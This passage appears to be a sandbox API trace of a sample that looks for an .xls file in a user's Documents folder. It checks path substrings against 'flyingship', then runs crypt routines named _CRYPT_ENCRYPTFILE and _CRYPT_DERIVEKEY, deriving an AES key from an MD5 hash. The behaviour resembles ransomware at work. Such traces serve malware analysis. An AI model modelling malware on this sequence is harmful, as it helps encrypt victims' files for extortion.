dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xls", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0176.456] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0176.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0176.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0176.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0176.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0176.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0176.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0176.456] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0176.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0176.456] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0176.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0176.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0176.457] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0e05420, ftCreationTime.dwHighDateTime=0x1d5da04, ftLastAccessTime.dwLowDateTime=0x508ab760, ftLastAccessTime.dwHighDateTime=0x1d5deb6, ftLastWriteTime.dwLowDateTime=0x508ab760, ftLastWriteTime.dwHighDateTime=0x1d5deb6, nFileSizeHigh=0x0, nFileSizeLow=0x14fb7, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Pwvig6N-.xls", cAlternateFileName="")) returned 0x90add8 [0176.458] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0176.458] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.458] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0e05420, ftCreationTime.dwHighDateTime=0x1d5da04, ftLastAccessTime.dwLowDateTime=0x508ab760, ftLastAccessTime.dwHighDateTime=0x1d5deb6, ftLastWriteTime.dwLowDateTime=0x508ab760, ftLastWriteTime.dwHighDateTime=0x1d5deb6, nFileSizeHigh=0x0, nFileSizeLow=0x14fb7, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Pwvig6N-.xls", cAlternateFileName="")) returned 0x90add8 [0176.458] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0176.458] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pwvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wvig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ig6N-.xls\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.460] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.460] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0176.460] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0176.460] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0176.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xls", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0176.460] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0176.460] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0176.460] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0176.461] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0176.461] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.461] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0e05420, ftCreationTime.dwHighDateTime=0x1d5da04, ftLastAccessTime.dwLowDateTime=0x508ab760, ftLastAccessTime.dwHighDateTime=0x1d5deb6, ftLastWriteTime.dwLowDateTime=0x508ab760, ftLastWriteTime.dwHighDateTime=0x1d5deb6, nFileSizeHigh=0x0, nFileSizeLow=0x14fb7, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="Pwvig6N-.xls", cAlternateFileName="")) returned 0x90ae18 [0176.461] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0176.461] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.461] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0176.461] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.461] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0176.461] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0176.461] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.461] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0176.461] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.461] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.461] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0176.461] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0176.461] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0176.461] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.461] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.462] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.462] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0176.462] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.462] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0176.463] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.463] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.463] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0176.463] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0176.463] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0176.463] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.463] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.463] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.463] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0176.463] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0176.463] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0176.463] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.463] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.463] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.463] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.463] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0176.463] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.463] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.463] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0176.464] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.464] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0176.464] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0176.464] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.464] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.464] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0176.464] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0176.464] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0176.464] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.464] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.464] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0176.464] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0176.464] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0176.464] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.464] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0176.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.464] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0176.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.464] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.464] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0176.465] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.465] CryptHashData (hHash=0x90af58, pbData=0x8dee70, dwDataLen=0x19, dwFlags=0x1) returned 1 [0176.465] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.465] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.465] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.465] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.465] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0176.465] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0176.465] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0176.465] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.465] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 